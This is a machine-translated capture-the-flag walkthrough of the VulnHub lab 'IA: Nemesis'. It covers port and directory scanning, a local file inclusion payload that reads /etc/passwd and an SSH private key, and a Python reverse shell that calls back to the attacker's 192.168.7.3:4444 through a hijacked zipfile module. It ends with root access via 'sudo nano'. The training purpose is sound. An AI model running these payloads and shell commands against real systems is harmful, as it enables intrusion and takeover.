No.28 Nemesis

Target information

Download address :

https://www.vulnhub.com/entry/ia-nemesis-101,582/

shooting range : VulnHub.com

Target name : IA: Nemesis (1.0.1)

difficulty : secondary - difficult

Release time : 2020 year 10 month 25 Japan

Prompt information :

 This box is to improve Linux Privilege escalation and CMS Skills , I hope you like .

The goal is : 2 individual flag

Experimental environment

 attack :VMware	kali	192.168.7.3

 Drone aircraft :Vbox		linux	IP Automatic access to 

information gathering

Scan host

Scan the target in the LAN IP Address

sudo nmap -sP 192.168.7.1/24

The scanned host address is 192.168.7.166

Scan port

Scan the open service port of the target

sudo nmap -sC -sV -p- 192.168.7.166 -oN Nemesis.nmap

Scan to 3 Open ports , among 80（http）52845（http）、52846（SSH）, First visit 80 port

Web penetration

http://192.168.7.166

There are some tips after opening the home page , Let's find the bug and fix it , First do a directory scan

Directory scanning

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.7.166 -x php,html,txt,zip

Scan to contact.php and robots.txt, hold robots.txt Download and see what it has

wget http://192.168.7.166/robots.txt
cat robots.txt

Tip let's find the real vulnerability , Look again. contact.php What is it?

http://192.168.7.166/contact.php

A normal page , Find some tips in the source code

a section php Code , obtain 3 Parameter echo 1 individual , Let's try

http://192.168.7.166/contact.php?name=a&email=b&message=ls
http://192.168.7.166/contact.php?name=a&email=b&message=../../../../etc/passwd

No information is echoed , Maybe the injection point is not here . stay login.html Find some information in the page source code

http://192.168.7.166/login.html

I think it's user name, password and so on. Write it down first , There is also a page thanoscarlos.html Visit

No useful information , visit 52845 port

http://192.168.7.166:52845

After the visit is a html5 Make a website , stay Contact Us I found that some of the contents are the same as the previous php The tips on the page are very similar

The same is 3 Parameters , Let's try

Pop up and save to file after submission , Related to documents , Maybe the file contains , Try again.

The local file contains a vulnerability

After submission, it appears passwd The contents of the document , Take a look at the source code

Two users have login permission , This one below thanos With the front login.html The same one is displayed on the page hacker_in_the_town Could it be a password ,SSH Log in and try （ There's a leak here 1 individual

ssh [email protected] -p 52846

It is logged in with public key , Try to read thanos Public key under user directory

payload

message=../../../../home/thanos/.ssh/id_rsa&submit=

Successfully read the public key file , Save him , Try logging in again

ssh [email protected] -p 52846 -i id_rsa

Check what is in the user directory

ls -al
cat flag1.txt

Find a backup python Scripts and flag1.txt, And then look at backup.py The content of

cat backup.py

This script will /var/www/html Catalog backup to /tmp/website.zip

home There is another one in the catalog carlos User directory , Prompt that you have no permission when accessing , Find the right information

perform sudo -l Time confirmation hacker_in_the_town No thanos Password ,suid There's no authority , Upload a pspy64

kali Open an account on the attack plane http service

python3 -m http.server

Download from the target pspy64

wget http://192.168.7.3:8000/pspy64

pspy64 Add execute permission and run

chmod +x pspy64
./pspy64

You can see UID1000 Of users execute every minute backup.py Script

This UID Namely carlos user , We can use this script to raise rights , Let's take a look at the script

cat backup.py

Here's a quote from zipfile, We can do it in backup.py File directory to create a zipfile.py file

kali Operation on attack

Listen first 4444 port

nc -lvvp 4444

To create a zipfile.py file

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.7.3",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Turn on http service

python3 -m http.server

Download from the target zipfile.py file

wget http://192.168.7.3:8000/zipfile.py

Wait a moment, and the target will automatically execute backup.py Script

Rebound success , Switch to interactive shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+z Shortcut key 
stty -a
stty raw -echo;fg
reset

Switch complete , see carlos What is in the user directory

ls -al

see flag2.txt

cat flag2.txt

Get the number 2 individual flag, Check it again root.txt

cat root.txt

The prompt says carlos The user's password has been encrypted , The encrypted code is stored in encrypt.py In file , Let's crack the encrypted content , The format is

************FUN********

Let's have a look at encrypt.py What is in the script

cat encrypt.py

Through the script, you can see that it is through affine encrypt Encrypted ,

FAJSRWOXLAXDQZAWNDDVLSU

We went to the dcode.fr Take a look , You should pay attention to using this website , Be sure to wait until all are loaded , Otherwise, the operation will fail

https://www.dcode.fr/chiffre-affine

On the left is the solution , We follow the rules given before Compare the ENCRYPTIONISFUNPASSWORD

We use this password to execute sudo command

sudo -l
 Input password ENCRYPTIONISFUNPASSWORD

The password is correct , find sudo A power order nano

sudo /bin/nano /opt/priv
Ctrl + r
Ctrl + x
reset; sh 1>&0 2>&0

Ctrl + r

Ctrl + x

Input reset; sh 1>&0 2>&0

There is no response on the screen after input , In fact, the right has been raised successfully , When the input id You can see

id

Looks a little uncomfortable , use python Switch to interactive shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
cd /root
ls

cat root.txt

Get root.txt, Game over . Friends who like shooting can search on wechat “ It's safe to go to school on vobo road ” official account 、 Or scan the QR code below to get more targeting articles .